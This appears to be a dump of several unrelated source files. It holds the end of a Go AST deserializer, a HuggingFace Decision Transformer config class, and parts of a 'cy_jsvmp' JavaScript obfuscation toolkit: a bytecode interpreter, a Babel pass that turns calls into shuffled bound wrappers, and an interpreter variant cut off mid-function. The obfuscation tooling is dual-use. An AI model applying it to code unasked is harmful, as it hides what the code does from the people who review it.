		}
		Body := parseAST(data["Body"].(map[string]interface{}), nil)
		dt := &ast.ForInStatement{
			Left:  Init,
			Body:  Body,
			Right: Test,
		}
		return dt
	case token.ArrayE:
		dt := &ast.ArrayExpression{Elements: make([]*ast.Statement, 0)}
		kss := data["Elements"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Elements = append(dt.Elements, &lpm2)
		}
		return dt
	case token.Object:
		dt := &ast.ObjectExpression{Properties: make([]*ast.Statement, 0)}
		kss := data["Properties"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Properties = append(dt.Properties, &lpm2)
		}
		return dt
	case token.Prop:
		Key := parseAST(data["Key"].(map[string]interface{}), nil)
		Value := parseAST(data["Value"].(map[string]interface{}), nil)
		dt := &ast.Property{Key: Key, Value: Value}
		return dt
	case token.TRY:
		Block := parseAST(data["Block"].(map[string]interface{}), nil)
		Handler := parseAST(data["Handler"].(map[string]interface{}), nil)
		dt := &ast.TryStatement{Block: Block, Handler: Handler}
		return dt
	case token.CATCH:
		var Param ast.Statement
		// BUG FIX: this previously tested the freshly declared (always-nil)
		// local `Param` instead of the serialized field, so a catch-clause
		// parameter was never restored. Mirror the optional-field pattern
		// used by token.FuncE above.
		if data["Param"] != nil {
			Param = parseAST(data["Param"].(map[string]interface{}), nil)
		} else {
			Param = nil
		}
		Body := parseAST(data["Body"].(map[string]interface{}), nil)
		dt := &ast.CatchClause{Param: Param, Body: Body}
		return dt
	case token.RETURN:
		Argument := parseAST(data["Argument"].(map[string]interface{}), nil)
		dt := &ast.ReturnStatement{Argument: Argument}
		return dt
	case token.Debug:
		dt := &ast.DebugStatement{}
		return dt
	case token.NEW:
		Callee := parseAST(data["Callee"].(map[string]interface{}), nil)
		dt := &ast.NewExpression{Callee: Callee, Arguments: make([]*ast.Statement, 0)}
		kss := data["Arguments"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Arguments = append(dt.Arguments, &lpm2)
		}
		return dt
	}
	// Unknown node tag: nothing we can rebuild.
	return nil
}
// LoadStr decodes a JSON-serialized AST string and rebuilds the node tree.
// On malformed JSON it logs the error to stdout and returns nil.
func LoadStr(raw string) ast.Statement {
	var root map[string]interface{}
	err := json.Unmarshal([]byte(raw), &root)
	if err != nil {
		fmt.Println("Error parsing JSON:", err)
		return nil
	}
	return parseAST(root, nil)
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 7,323 | src/transformers/models/decision_transformer/configuration_decision_transformer.py | # coding=utf-8
# Copyright 2022 The HuggingFace Team and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Decision Transformer model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
# Maps pretrained checkpoint identifiers to the URLs of their hosted config files.
DECISION_TRANSFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP = {
    "edbeeching/decision-transformer-gym-hopper-medium": (
        "https://huggingface.co/edbeeching/decision-transformer-gym-hopper-medium/resolve/main/config.json"
    ),
    # See all DecisionTransformer models at https://huggingface.co/models?filter=decision_transformer
}
class DecisionTransformerConfig(PretrainedConfig):
    """
    This is the configuration class to store the configuration of a [`DecisionTransformerModel`]. It is used to
    instantiate a Decision Transformer model according to the specified arguments, defining the model architecture.
    Instantiating a configuration with the defaults will yield a similar configuration to that of the standard
    DecisionTransformer architecture. Many of the config options are used to instantiate the GPT2 model that is used as
    part of the architecture.
    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.
    Args:
        state_dim (`int`, *optional*, defaults to 17):
            The state size for the RL environment
        act_dim (`int`, *optional*, defaults to 4):
            The size of the output action space
        hidden_size (`int`, *optional*, defaults to 128):
            The size of the hidden layers
        max_ep_len (`int`, *optional*, defaults to 4096):
            The maximum length of an episode in the environment
        action_tanh (`bool`, *optional*, defaults to True):
            Whether to use a tanh activation on action prediction
        vocab_size (`int`, *optional*, defaults to 1):
            Vocabulary size of the GPT-2 model. Defines the number of different tokens that can be represented by the
            `inputs_ids` passed when calling [`DecisionTransformerModel`].
        n_positions (`int`, *optional*, defaults to 1024):
            The maximum sequence length that this model might ever be used with. Typically set this to something large
            just in case (e.g., 512 or 1024 or 2048).
        n_layer (`int`, *optional*, defaults to 3):
            Number of hidden layers in the Transformer encoder.
        n_head (`int`, *optional*, defaults to 1):
            Number of attention heads for each attention layer in the Transformer encoder.
        n_inner (`int`, *optional*):
            Dimensionality of the inner feed-forward layers. If unset, will default to 4 times `n_embd`.
        activation_function (`str`, *optional*, defaults to `"relu"`):
            Activation function, to be selected in the list `["relu", "silu", "gelu", "tanh", "gelu_new"]`.
        resid_pdrop (`float`, *optional*, defaults to 0.1):
            The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        embd_pdrop (`int`, *optional*, defaults to 0.1):
            The dropout ratio for the embeddings.
        attn_pdrop (`float`, *optional*, defaults to 0.1):
            The dropout ratio for the attention.
        layer_norm_epsilon (`float`, *optional*, defaults to 1e-5):
            The epsilon to use in the layer normalization layers.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        scale_attn_weights (`bool`, *optional*, defaults to `True`):
            Scale attention weights by dividing by sqrt(hidden_size).
        use_cache (`bool`, *optional*, defaults to `True`):
            Whether or not the model should return the last key/values attentions (not used by all models).
        scale_attn_by_inverse_layer_idx (`bool`, *optional*, defaults to `False`):
            Whether to additionally scale attention weights by `1 / layer_idx + 1`.
        reorder_and_upcast_attn (`bool`, *optional*, defaults to `False`):
            Whether to scale keys (K) prior to computing attention (dot-product) and upcast attention
            dot-product/softmax to float() when training with mixed precision.
    Example:
    ```python
    >>> from transformers import DecisionTransformerConfig, DecisionTransformerModel
    >>> # Initializing a DecisionTransformer configuration
    >>> configuration = DecisionTransformerConfig()
    >>> # Initializing a model (with random weights) from the configuration
    >>> model = DecisionTransformerModel(configuration)
    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""

    model_type = "decision_transformer"
    keys_to_ignore_at_inference = ["past_key_values"]
    # Map the generic PretrainedConfig attribute names onto the GPT2-style ones.
    attribute_map = {
        "max_position_embeddings": "n_positions",
        "num_attention_heads": "n_head",
        "num_hidden_layers": "n_layer",
    }

    def __init__(
        self,
        state_dim=17,
        act_dim=4,
        hidden_size=128,
        max_ep_len=4096,
        action_tanh=True,
        vocab_size=1,
        n_positions=1024,
        n_layer=3,
        n_head=1,
        n_inner=None,
        activation_function="relu",
        resid_pdrop=0.1,
        embd_pdrop=0.1,
        attn_pdrop=0.1,
        layer_norm_epsilon=1e-5,
        initializer_range=0.02,
        scale_attn_weights=True,
        use_cache=True,
        bos_token_id=50256,
        eos_token_id=50256,
        scale_attn_by_inverse_layer_idx=False,
        reorder_and_upcast_attn=False,
        **kwargs,
    ):
        self.state_dim = state_dim
        self.act_dim = act_dim
        self.hidden_size = hidden_size
        self.max_ep_len = max_ep_len
        self.action_tanh = action_tanh
        self.vocab_size = vocab_size
        self.n_positions = n_positions
        self.n_layer = n_layer
        self.n_head = n_head
        self.n_inner = n_inner
        self.activation_function = activation_function
        self.resid_pdrop = resid_pdrop
        self.embd_pdrop = embd_pdrop
        self.attn_pdrop = attn_pdrop
        self.layer_norm_epsilon = layer_norm_epsilon
        self.initializer_range = initializer_range
        self.scale_attn_weights = scale_attn_weights
        self.use_cache = use_cache
        self.scale_attn_by_inverse_layer_idx = scale_attn_by_inverse_layer_idx
        self.reorder_and_upcast_attn = reorder_and_upcast_attn
        self.bos_token_id = bos_token_id
        self.eos_token_id = eos_token_id
        super().__init__(bos_token_id=bos_token_id, eos_token_id=eos_token_id, **kwargs)
|
2833844911/cy_jsvmp | 18,188 | tool/jsvmp_02.js | function cltothis(cythis, poolList,off){
for (let i in poolList){
if (off == 1){
cythis[i] = undefined
}else{
cythis[i] = poolList[i];
}
}
}
// cbb_jsvmp is the bytecode interpreter of the JS-VMP: a stack machine that
// dispatches on numeric opcodes read from `shuz` (the bytecode array),
// starting at `start`, using `duei` as the operand stack and `constantPool`
// (a surrounding global) for literals.
//   all      — current scope object / receiver tracking for member calls
//   duei     — operand stack (also reused as the parent frame's stack)
//   start    — program counter into `shuz`
//   shuz     — bytecode (array of numbers)
//   argsList — arguments of the function frame being executed
//   ogg      — explicit `this` for the frame (falls back to `all`)
//   op       — when set, a saved-register bundle used to resume a nested
//              frame (try/catch blocks re-enter this function recursively)
// Returns the sentinel string "-90_cbb" on an unknown opcode so nested
// frames can unwind.
function cbb_jsvmp(all, duei, start, shuz,argsList, ogg, op) {
    // Walk up the scope chain (via hasOwnProperty) and assign `e` to the
    // owner of property `d`; fall back to the global `window` when no owner
    // exists or the assignment throws.
    function getproto(s,d,e){
        let dt = s;
        for ( ;1==1;){
            if (s.hasOwnProperty(d)){
                try{
                    s[d] = e
                }catch(e2){
                    window[d] = e
                    return
                }
                break
            }else{
                s = s.__proto__
                if (s == undefined || s==null){
                    window[d] = e
                    return
                }
            }
        }
    }
    // Frame setup: either restore registers from a resume bundle (`op`) or
    // start a fresh frame whose scope `cbbb` is `all` itself.
    if (op !==undefined){
        var allthis
        allthis = op['allthis']
        duei = op.duei
        all = op.all
        shuz = op.shuz
        argsList = op.argsList
        var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2,i ;
        a7 = op.a7
        var args = op.args
        var cbbb = op.cbbb;
    }else{
        var allthis
        if (ogg !== undefined){
            allthis = ogg
        }else{
            allthis = all
        }
        var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2, i;
        var args = []
        var cbbb = all;
    }
    // Main fetch/decode/execute loop.
    while (!![]) {
        let s_cbb = shuz[start++];
        switch(s_cbb){
            case 23:
                // push current scope object
                all = cbbb
                duei.push(cbbb)
                break
            case 47:
                // push `this`
                duei.push(allthis)
                break
            // --- binary comparisons: pop rhs then lhs, push result ---
            case 36:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 <= a1;
                duei.push(a1)
                break
            case 37:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 >= a1;
                duei.push(a1)
                break
            case 38:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 > a1;
                duei.push(a1)
                break
            case 39:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 == a1;
                duei.push(a1)
                break
            case 48:
                // switch/case dispatch: operand = case count; stack holds
                // `count` jump offsets then `count` case values, then the
                // discriminant. Jump to the first matching (or null/default)
                // case's offset.
                a1 = shuz[start++] * 2
                a3 = []
                a4 = []
                for (a2=0; a2< a1;a2++){
                    if (a2 < a1/2){
                        a3.splice(0,0,duei.pop())
                    }else{
                        a4.splice(0,0,duei.pop())
                    }
                }
                a1 = duei.pop()
                for (a2=0; a2 < a3.length; a2++){
                    if (a4[a2] == a1){
                        start += a3[a2]
                        break
                    }
                    else if (a4[a2] == null){
                        start += a3[a2]
                        break
                    }
                }
                break
            case 53:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 === a1;
                duei.push(a1)
                break
            case 54:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 !== a1;
                duei.push(a1)
                break
            case 550:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 != a1;
                duei.push(a1)
                break
            case 551:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 in a1;
                duei.push(a1)
                break
            case 22:
                // obj[constantPool[operand]] = value  (object, value on stack)
                a1 = shuz[start++]
                a2 = duei.pop()
                a3 = duei.pop()
                a2[constantPool[a1]] = a3
                break
            // --- arithmetic / bitwise binary ops ---
            case 19:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 - a1;
                duei.push(a1)
                break
            case 291:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 - a1;
                duei.push(a1)
                break
            case 20:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 + a1;
                duei.push(a1)
                break
            case 24:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 < a1;
                duei.push(a1)
                break
            case 240:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 < a1;
                duei.push(a1)
                break
            case 27:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a1 * a2;
                duei.push(a1)
                break
            case 28:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 % a1;
                duei.push(a1)
                break
            case 29:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 ^ a1;
                duei.push(a1)
                break
            case 30:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 / a1;
                duei.push(a1)
                break
            case 194:
                // `debugger` statement
                debugger;
                break
            case 25:
                // jump-if-false by operand offset
                a1 = duei.pop()
                a2 = shuz[start++]
                if (!a1) {
                    start += a2;
                }
                ;break
            case 31:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 << a1;
                duei.push(a1)
                break
            case 32:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 | a1;
                duei.push(a1)
                break
            case 26:
                // increment property named by constant pool entry
                a1 = duei.pop()
                // a2 = duei.pop()
                a3 = shuz[start++]
                a1[ constantPool[a3]] += 1
                break
            case 190:
                // unconditional relative jump
                a1 = shuz[start++]
                start += a1
                break
            case 192:
                // jump-if-true by operand offset
                a1 = duei.pop()
                a3 = shuz[start++]
                if (a1) {
                    start += a3
                }
                break
            case 33:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 >> a1;
                duei.push(a1)
                break
            case 34:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 >>> a1;
                duei.push(a1)
                break
            case 52:
                // decrement property named by constant pool entry
                a1 = duei.pop()
                // a2 = duei.pop()
                a3 = shuz[start++]
                a1[ constantPool[a3]] -= 1
                break
            case 104:
                // push empty object literal
                duei.push({})
                break
            case 105:
                // push empty array literal
                duei.push([])
                break
            case 57:
                // for-in setup: snapshot the enumerable keys of the popped
                // object into a scope-local list indexed by the operand.
                i = []
                a3 = shuz[start++]
                a2 = duei.pop()
                for (a1 in a2){
                    i.push(a1)
                }
                cbbb['for_in_xh_cbb_list'+a3] = i
                break
            case 51:
                // short-circuit &&: jump and re-push the falsy value
                a1 = duei.pop()
                a2 = shuz[start++]
                if (!a1) {
                    start += a2;
                    duei.push(a1)
                }
                ;break
            case 252:
                // short-circuit ||: jump and re-push the truthy value
                a1 = duei.pop()
                a2 = shuz[start++]
                if (a1) {
                    start += a2;
                    duei.push(a1)
                }
                ;break
            case 195:
                // try/catch/finally: operands are the relative offsets of the
                // catch, finally and continuation blocks; each region runs as
                // a recursive interpreter frame sharing this frame's state.
                a2 = shuz[start++]
                a3 = shuz[start++]
                a4 = shuz[start++]
                try{
                    a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
                        "shuz":shuz,
                        "cbbb":cbbb,
                        "allthis":allthis,
                        "argsList":argsList,
                        "args":args,
                        "duei":duei,
                        "all": all,
                        "a7":a7
                    })
                    start = a2+start;
                    if (a6 == "-90_cbb"){
                        return a6
                    }
                }catch(e){
                    // caught exception is kept in a7 for opcode 197
                    a7 = e
                    start = a2+start;
                    a6 = cbb_jsvmp(a1, start, start, duei, args.length, 1, {
                        "shuz":shuz,
                        "cbbb":cbbb,
                        "allthis":allthis,
                        "args":args,
                        "argsList":argsList,
                        "duei":duei,
                        "all": all,
                        "a7":a7
                    })
                    if (a6 == "-90_cbb"){
                        return a6
                    }
                }finally{
                    if (a6 == "-90_cbb"){
                        return a6
                    }
                    start = a3+start;
                    a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
                        "shuz":shuz,
                        "cbbb":cbbb,
                        "allthis":allthis,
                        "argsList":argsList,
                        "args":args,
                        "duei":duei,
                        "all": all,
                        "a7":a7
                    })
                    if (a6 == "-90_cbb"){
                        return a6
                    }
                    start =start+ a4
                }
                break
            case 35:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 & a1;
                duei.push(a1)
                break
            case 8:
                // regex literal: pattern and flags come from the constant pool
                a1 = shuz[start++]
                a2 = shuz[start++]
                a1 = new RegExp( constantPool[a1], constantPool[a2]) ;
                duei.push(a1)
                break
            case 10:
                // push constant-pool literal
                a1 = shuz[start++]
                duei.push(constantPool[a1])
                break
            case 11:
                // push immediate number
                a1 = shuz[start++]
                duei.push(a1)
                break
            case 58:
                // throw
                a1 = duei.pop()
                throw a1
                break
            case 40:
                // array element append (array literal construction)
                a1 = duei.pop()
                a2 = duei.pop()
                a2.push(a1);
                duei.push(a2)
                break
            case 1:
                // function declaration hoisting: for each name on the stack,
                // install a closure that builds a fresh frame (variable pool +
                // bytecode from the global `changlc` table) and interprets it.
                a8 = duei.length
                for (a1=0; a1< a8; a1++){
                    a7 = duei.pop()
                    // `let g` per iteration so each closure captures its own name
                    let g = a7
                    all[g] = function(){
                        let g2 = []
                        var huuuu = this
                        if (offnew == 1){
                            // constructor call path (see opcode 46): return `this`
                            offnew=0
                            a9 = {
                                "variablePool":{},
                                "arguments": arguments,
                                "zhili":[]
                            }
                            a9.__proto__ = cbbb
                            cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
                            cltothis(a9,a9['variablePool'], 1)
                            cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
                            a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
                            return huuuu
                        }else{
                            a9 = {
                                "variablePool":{},
                                "arguments": arguments,
                                "zhili":[]
                            }
                            cltothis(a9['variablePool'],changlc[cbbb.variablePool[g]].variablePool)
                            cltothis(a9,a9['variablePool'], 1)
                            cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
                            a9.__proto__ = cbbb
                            a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
                        }
                        // normal call path: last stack value is the return value
                        if (g2.length == 0){
                            return undefined
                        }else{
                            let h = g2.pop()
                            for (;1==1;){
                                if (g2.length == 0){
                                    break
                                }else{
                                    g2.pop()
                                }
                            }
                            return h
                        }
                    }
                }
                break
            case 2:
                // bind declared parameter names to the incoming argsList
                a1 = duei.length
                for (a2 = 0; a2 < a1; a2++){
                    a3 = duei.shift()
                    if (argsList[a2] != undefined ){
                        cbbb[a3] = argsList[a2];
                    }
                }
                break
            case 90:
                // store: obj[key] = value; scope objects (with variablePool)
                // go through the prototype-chain walker instead.
                a1 = duei.pop()
                a2 = duei.pop()
                a3 = duei.pop()
                // a3[a2] = a1;
                // getproto(a3,a2,a1)
                if (a3.variablePool != undefined){
                    getproto(a3,a2,a1)
                }else{
                    a3[a2] = a1
                }
                break
            case 290:
                // same as 90 (duplicate store opcode)
                a1 = duei.pop()
                a2 = duei.pop()
                a3 = duei.pop()
                // a3[a2] = a1;
                // getproto(a2,a1,a3)
                if (a3.variablePool != undefined){
                    getproto(a3,a2,a1)
                }else{
                    a3[a2] = a1
                }
                break
            // --- unary operators ---
            case 44:
                a5 = duei.pop()
                duei.push(~a5)
                break
            case 49:
                a5 = duei.pop()
                duei.push(typeof a5)
                break
            case 50:
                a5 = duei.pop()
                duei.push(- a5)
                break
            case 45:
                // store like 90 but leaves the target object on the stack
                a1 = duei.pop()
                a2 = duei.pop()
                a3 = duei.pop()
                // a3[a2] = a1;
                // getproto(a3,a2,a1)
                if (a3.variablePool != undefined){
                    getproto(a3,a2,a1)
                }else{
                    a3[a2] = a1
                }
                duei.push(a3)
                break
            case 55:
                // delete obj[key]
                a1 = duei.pop()
                a2 = duei.pop()
                a3 = delete a2[a1];
                duei.push(a3)
                break
            case 56:
                a5 = duei.pop()
                duei.push(void a5)
                break
            case 60:
                a5 = duei.pop()
                duei.push(!a5)
                break
            case 197:
                // bind the caught exception (a7, set by opcode 195) to the
                // catch parameter.
                j = duei.pop()
                j2 = duei.pop()
                // j2[j] = a1
                // getproto(j2,j,a1)
                if (j2.variablePool != undefined){
                    getproto(j2,j,a7)
                }else{
                    // NOTE(review): this branch stores a1 (stale) while the
                    // branch above stores the exception a7 — looks
                    // inconsistent; confirm against the bytecode compiler.
                    j2[j] = a1
                }
                break
            case 46:
                // `new` expression: operand = argc; offnew signals the closure
                // created by opcode 1 to take the constructor path.
                a1 = shuz[start++]
                a3 = duei.pop()
                args = []
                for (a2=0; a2<a1; a2++ ){
                    args.splice(0,0,duei.pop())
                }
                offnew = 1
                // if (a3 == RegExp){
                //
                //     a4 = new RegExp(args[0], args[1])
                //
                //
                // }else{
                //     a4 = new a3(...args)
                //
                // }
                a4 = new a3(...args)
                offnew = 0
                duei.push(a4)
                break
            case 150:
                // direct call: operand = argc. Native globals found on
                // `window` are invoked bare; everything else is applied with
                // the receiver recorded by opcode 181.
                a1 = shuz[start++]
                a3 = duei.pop()
                args = []
                for (a2=0; a2<a1; a2++ ){
                    args.splice(0,0,duei.pop())
                }
                let found = false;
                for (let key of Object.getOwnPropertyNames(window)) {
                    if (typeof window[key] === 'function' && a3 === window[key]) {
                        a4 = window[key](...args)
                        found = true;
                        break;
                    }
                }
                if (!found) {
                    a4 = a3.apply(all, args)
                }
                duei.push(a4)
                break
            case 181:
                // member load: push obj[key], falling back to window[key];
                // remember the object in `all` as the receiver for opcode 150.
                a1 = duei.pop();
                a2 = duei.pop();
                try{
                    a1 = a2[a1]
                }catch(e){
                    a1 = window[a1]
                }
                // if (a2 == window && a1==undefined){
                //     throw new Error("")
                // }
                all = a2
                duei.push(a1)
                break
            case 1810:
                // pop and discard (expression statement result)
                a1 = duei.pop();
                break
            case 1811:
                a1 = duei.pop()
                a2 = duei.pop()
                a1 = a2 instanceof a1;
                duei.push(a1)
                break
            case 200:
                // end of bytecode
                return
            default:
                // unknown opcode: unwind sentinel
                return "-90_cbb"
        }
    }
}
// Node compatibility shim: when no browser `window` exists, fabricate one
// that carries the CommonJS module bindings and inherits from `global`.
if (!this.window){var window = {"exports": exports,"require": require,"module":module,"__dirname":__dirname,"__filename":__filename};window.__proto__=global;};
// Flag toggled around `new` expressions inside the VM (see opcode 46 / opcode 1).
offnew = 0
// Seed the top-level scope with the entry function's variable pool and bytecode
// from the global `changlc` table.
window['variablePool'] = {}
window['zhili'] = []
cltothis(window['variablePool'],changlc.awcbb_yhh_fun0.variablePool)
cltothis(window['zhili'], changlc.awcbb_yhh_fun0.zhili)
// Start interpreting the entry function's bytecode with `window` as scope.
cbb_jsvmp( window, [], 0, changlc.awcbb_yhh_fun0.zhili)
2833844911/cy_jsvmp | 4,754 | tool/bindfun.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
// tiancHans ("fill functions") post-processes obfuscated source: it collects
// every `var cbb0...` declaration produced by bindfun, replaces the
// duplicated `duei.cf/sf/Cf/cF` bound-call initializers with lookups into a
// runtime `zzhans` array, and injects a `banhhans()` builder that
// reconstructs those bound functions at load time from a numeric recipe.
function tiancHans(data){
    // Runtime prelude injected into the output: rebuilds each zzhans slot
    // from its numeric tag (1=cf, 2=sf, 3=Cf, anything else=cF).
    var code = `
function banhhans(){
  for (let i = 0; i < zzhans.length; i++){
     if (zzhans[i] == 1) {
        zzhans[i] = duei.cf.bind(duei).call.bind(duei.cf.bind(duei), duei.cf.bind(duei))
     } else {
        if (zzhans[i] == 2){
            zzhans[i] = duei.sf.bind(duei).call.bind(duei.sf.bind(duei), duei.sf.bind(duei))
        }else{
            if (zzhans[i] == 3){
                zzhans[i] = duei.Cf.bind(duei).call.bind(duei.Cf.bind(duei), duei.Cf.bind(duei))
            }else{
                zzhans[i] = duei.cF.bind(duei).call.bind(duei.cF.bind(duei), duei.cF.bind(duei))
            }
        }
     };
  }
}
banhhans();
`
    var datame = []          // numeric recipe, one entry per cbb0* declaration
    var kswz = "";           // name of the first cbb0* variable (splice anchor)
    var ffff = 0             // whether the first declaration path was taken
    var fg;                  // NodePath of the first cbb0* declaration
    var ggggj = []           // replacement declarators: cbb0X = zzhans[idx]
    var parseHj = {
        VariableDeclaration(path){
            // Only rewrite the generated `cbb0*` declarations.
            if (path.node.declarations[0].id.name.indexOf("cbb0") === -1 ){
                return
            }
            if (kswz === ""){
                kswz = path.node.declarations[0].id.name
            }
            // Which duei method was bound (cf/sf/Cf/cF) determines the tag.
            var y = path.node.declarations[0].init.callee.object.object.callee.object.property.name
            var yu;
            switch (y){
                case "cf":
                    yu = 1;
                    break
                case "sf":
                    yu = 2
                    break
                case "Cf":
                    yu = 3
                    break
                case "cF":
                    // any value > 3 means cF; randomized to avoid a fixed tag
                    yu = Math.ceil(3 +Math.random() * 10 +0.1)
                    break
                default:
                    break
            }
            datame.push(yu)
            // cbb0X -> zzhans[index]
            ggggj.push(tee.variableDeclarator(tee.identifier(path.node.declarations[0].id.name), tee.memberExpression(
                tee.identifier("zzhans"), tee.NumericLiteral(datame.length-1), true, false
            )))
            // Keep the first declaration as the anchor to replace later;
            // remove all subsequent ones.
            if (ffff === 0){
                fg = path
                ffff = 1
                path.skip()
            }else {
                path.remove();
            }
        }
    }
    let ast = parser.parse(data)
    traverse(ast, parseHj)
    // Replace the anchor declaration with the combined zzhans declarators.
    var f = tee.variableDeclaration("var",ggggj)
    fg.replaceInline(f)
    data = generator(ast).code;
    // Prepend the recipe array and splice the runtime prelude just before
    // the first zzhans-backed declaration.
    code = "var zzhans = "+ JSON.stringify(datame)+";\n"+code;
    data = data.replace("var "+ kswz, code+";var "+ kswz)
    return data
}
// bindfun rewrites every call site registered via a `CbbCs(obj, [calls...])`
// marker: each matching `obj.method(...)` expression is replaced by a
// generated `cbb000000N` variable holding a pre-bound
// `fn.bind(obj).call.bind(fn.bind(obj), fn.bind(obj))` wrapper, and the
// wrapper declarations are emitted (shuffled) in place of the marker call.
// The result is then passed through tiancHans for the zzhans-array pass.
function bindfun(data){
    // Fisher-Yates-style shuffle returning a new array (input untouched).
    function RandDataArray(data) {
        //混乱准备 (shuffle preparation)
        var dataTemp = [].concat(data);
        var dataBuffer = [];
        var length = dataTemp.length;
        //混乱数据 (shuffle the data)
        var randCount = 0;
        var position = 0;
        do {
            var randvalue = (((length - randCount) - 1) + 1);
            position = Math.floor(Math.random() * randvalue);
            dataBuffer.push(dataTemp[position]);
            randCount++;
            dataTemp[position] = dataTemp[length - randCount];
        } while (randCount < length);
        return dataBuffer;
    }
    // [markerSource, replacementDeclarations] pairs applied textually below.
    var needth = []
    let ast = parser.parse(data)
    let parseHj = {
        CallExpression(path){
            if (path.node.callee.name !== "CbbCs"){
                return
            }
            // All references to the marked binding within scope.
            var needBand = path.scope.getBinding(path.node.arguments[0].name);
            // Source text of each call expression listed in the marker.
            var czsj = []
            for (let i = 0; i < path.node.arguments[1].elements.length; i++){
                czsj.push(generator(path.node.arguments[1].elements[i]).code)
            }
            var jiaf = []
            var fname = 0;
            for (let i =0; i < needBand.referencePaths.length; i++){
                if (czsj.indexOf(needBand.referencePaths[i].parentPath+ '') !== -1){
                    // Build the bound-wrapper declaration and swap the call
                    // site for the generated variable name.
                    var data = `${"var cbb000000"+ fname} = ${needBand.referencePaths[i].parentPath+ ''}.bind(${needBand.referencePaths[i]+ ''}).call.bind(${needBand.referencePaths[i].parentPath+ ''}.bind(${needBand.referencePaths[i] + ''}), ${needBand.referencePaths[i].parentPath+ ''}.bind(${needBand.referencePaths[i] + ''}));`
                    jiaf.push( data);
                    needBand.referencePaths[i].parentPath.replaceWithSourceString("cbb000000"+ fname)
                    fname += 1;
                }
            }
            // Emit the declarations in random order where the marker stood.
            jiaf = RandDataArray(jiaf)
            needth.push([path+"", jiaf.join('')])
            path.skip()
        }
    }
    traverse(ast, parseHj)
    var d = generator(ast).code;
    for (let i = 0; i< needth.length; i++){
        d = d.replace(needth[i][0], needth[i][1])
    }
    d = tiancHans(d)
    return d
}
exports.bindfun = bindfun;
|
2833844911/cy_jsvmp | 22,755 | tool/jsvmp_out_pro.js | var baoChen = []
function cltothis(cythis, poolList,off){
for (let i in poolList){
if (off == 1){
cythis[i] = undefined
}else{
cythis[i] = poolList[i];
}
}
}
// Keep a reference to the native fetch before the VM scope setup can shadow it.
window._fetch = window.fetch
function cbb_jsvmp(all, duei, start, shuz, argsList, ogg, op) {
var cbb_xc = []
function getproto(s,d,e){
let dt = s;
for ( ;1==1;){
if (s.hasOwnProperty(d)){
try{
s[d] = e
}catch(e2){
window[d] = e
return
}
break
}else{
s = s.__proto__
if (s == undefined || s==null){
window[d] = e
return
}
}
}
}
if (op !==undefined){
var allthis
allthis = op['allthis']
duei = op.duei
all = op.all
shuz = op.shuz
argsList = op.argsList
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2,i,a10 ;
a7 = op.a7
var args = op.args
var cbbb = op.cbbb;
}else{
var allthis
if (ogg !== undefined){
allthis = ogg
}else{
allthis = all
}
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2, i,a10;
var args = []
var cbbb = all;
}
var jsq = 0,og = 0,lp= 0;
while (!![]) {
if (cbb_xc.length !== 0 && og == 1){
if (lp === 0){
jsq += 1
}
if (jsq === 10){
a10 = []
a10.push(a1)
a10.push(a2)
a10.push(a3)
a10.push(a4)
a10.push(a5)
a10.push(a6)
a10.push(a7)
a10.push(a8)
a10.push(a9)
a10.push(duei)
a10.push(start)
